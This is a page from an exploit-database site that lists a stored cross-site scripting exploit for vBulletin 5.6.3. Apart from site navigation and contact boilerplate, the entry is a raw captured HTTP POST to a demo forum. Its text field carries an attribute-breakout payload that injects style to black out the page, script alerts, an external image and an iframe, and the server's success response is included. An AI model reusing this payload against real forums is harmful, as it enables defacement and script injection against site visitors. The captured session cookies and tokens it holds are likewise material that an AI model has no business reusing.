0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
vBulletin 5.6.3 Persistent XSS Image Properties Vulnerability
https://8289cfe4157f-041544.demo.vbulletin.net/create-content/text/ Host: 8289cfe4157f-041544.demo.vbulletin.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1855 Origin: https://8289cfe4157f-041544.demo.vbulletin.net Connection: keep-alive Referer: https://8289cfe4157f-041544.demo.vbulletin.net/new-content/3 Cookie: PHPSESSID=b1e7fccc193576322852e188279e3c09dbb2c5ca3aa27902; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41544sessionhash=837ae139e93de6766093e52cb929818d; vb41544lastvisit=1598971031; vb41544lastactivity=1598971042; vb41544np_notices_displayed= securitytoken=1598971115-633179a0af862c995f9f9761092aa508c4a44151&iconid=0&title=test1&text=test test test <img alt="efre" class="bbcode-attachment" data-align="none" data-debug="debug__godzilla" data-linktarget="0" data-linktype="0" data-linkurl="" data-size="full" data-tempid="temp_51_1598971305231_517" src="filedata/fetch?filedataid=51&type=full" style="""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Stored XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Stored XSS<br></img><iframe>" title="grfr" />&files=&filedataids[temp_51_1598971305231_517]=51&filenames[temp_51_1598971305231_517]=xssed_logo.gif&uploadFrom=newContent,newContent&file=,&polloptions[new][]=,,&timeout=&eventstartdate=09/01/2020&is_all_day=1&eventenddate=09/01/2020&ignoredst=1&location=&autocompleteHelper=&tags=,&htmlstate=off&parentid=3&ret=https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum POST: HTTP/1.1 200 OK Date: Tue, 01 Sep 2020 14:41:49 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0 Expires: Sat, 1 Jan 2000 01:00:00 GMT Last-Modified: Tue, 01 Sep 2020 14:41:49 GMT Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Connection: keep-alive, Keep-Alive Content-Length: 112 Keep-Alive: timeout=2, max=100 Content-Type: application/json; charset=UTF-8 --------------------- # 0day.today [2024-07-02] #